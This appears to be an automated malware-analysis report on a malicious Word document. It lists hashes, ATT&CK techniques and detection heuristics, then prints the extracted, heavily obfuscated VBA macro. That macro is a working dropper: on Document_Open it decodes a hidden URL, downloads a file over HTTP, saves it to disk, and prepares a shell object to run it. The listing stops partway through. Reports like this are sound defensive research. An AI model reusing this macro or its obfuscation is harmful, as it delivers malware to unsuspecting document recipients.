Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d28372bb6e302a9c…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 128.0 KB
Created: 2020-04-19 04:19:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 32c32c919bc5f06d27741d0973b17a2d
SHA-1: 94301f56793f5f7a3dc420a39630f34161ecffb2
SHA-256: d28372bb6e302a9c0c14a8ab03e6e528c49717e5a7ab21bc722ff6a25c4c1a43
Risk Score: 172

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer

The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from an HTTP URL and saves it to disk, where it is then likely executed. The 'Document_Open' macro and 'CreateObject' calls further suggest malicious execution when the document is opened. The embedded URL, though marked as benign, is referenced by the macro, indicating its potential use in the download process.

Heuristics (7)

  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    PQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFC = QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.responseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15708 bytes
SHA-256: 605eb1b86098deb0192ff6c4f977da30a5b4025f8059686f0d87bca3568f2edd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 75 long base64-like blob(s).
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function CleanEncryptSTR(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY As String) As String
        Dim YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN As String
        YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN = "&0123456789;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
        Dim IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH As String
        Dim OYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQS As Boolean
        IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH = "DFHSGFJHSHFBDFBDFGSDRBRHBESRBERGSERHRHESDRGRFDBSDRGEARGHERGHESRHERGESRGESRHEHRFGBHSRGHESDRHERHBDRFGBHSDFGESRGHEWSRGHSGBESRGHESRHAREGERGASGHESRHESRHESRHERGESRGSERGASGEARGAREGHEHEAHRSE"
        OYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQS = False
        Dim i As Integer
        Dim FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR As Integer
        Dim NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM As String
        Dim SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS As Integer
        Dim LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW As Integer
        Dim XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK As String
 If Len(IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH) > 0 Then
            For i = 1 To Len(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY)
                NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM = Mid(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY, i, 1)
                SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS = InStr(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN, NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM)
                If SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS > 0 Then
                    FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR = Asc(Mid(IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH, i Mod Len(IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH) + 1, 1))
                    If OYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQS Then
                        LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS + FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR
                    Else
                        LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS - FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR
                    End If
                    LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW Mod Len(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN)
                    If LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW <= 0 Then
                        LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW + Len(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN)
                    End If
 XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK = XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK & Mid(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN, LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW, 1)
                Else
                    XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK = XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK & NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM
                End If
            Next i
        Else
            XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK = QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY
        End If
CleanEncryptSTR = XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK
End Function


Private Sub Document_Open()
Const QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY = 2

Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")

UBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEH = fso.GetSpecialFolder(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY)
Dim QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW
Set QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW = CreateObject("ADODB.STREAM")
YEPGUDSVGKEURSRTMJMCPIPRSOBPFXUPZUQWCTTNGTFLSJRLNZTSPYXJTGJHMOVGHMQODLUEOLGVZBZCURUKQQXZBWJRNFWXIVYFKUCVOCNMBRZTVIVBXHGQCOKIOWEOINYWLMDMPTOEIIIKVYDSYXGIJFRZVNFGQEHNMDKWWKOUJSIUDQEJGPHSKPSQWFM = UBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEH + CleanEncryptSTR("\YseXSUfTU.i2g")
Set CXCQXWFHIEQXUMDFODFMRCJCVJUTIYHZCPCIFOMXJURPUELVPUGDSTJTVZUKPPORDGKYFFNPQMYGDULMWLNUSKQEERVCPZPCKXKQNWNYRWZXDLTWXCOLBBRUEIDSQQQSLORZNNVQRNZOEDTOYTOVBSSMMZEKXIXJSYSROXVHYFHGLTUFGKWNCJZDMQLBYY = CreateObject("SHELL.APPLICATION")
Set QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD = CreateObject("MICROSOFT.XMLHTTP")
QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.Open "get", CleanEncryptSTR("n0Awy://31y.&rpuhw.wg/lq052qfv/J7IAP95Q/thsCBgMeui6bIDjfxhnD/xqqw.jEw"), False
DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL = 1


QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.send
PQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFC = QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.responseBody
If QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.Status = 200 Then
QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Open
QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Type = DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL
QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Write PQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFC
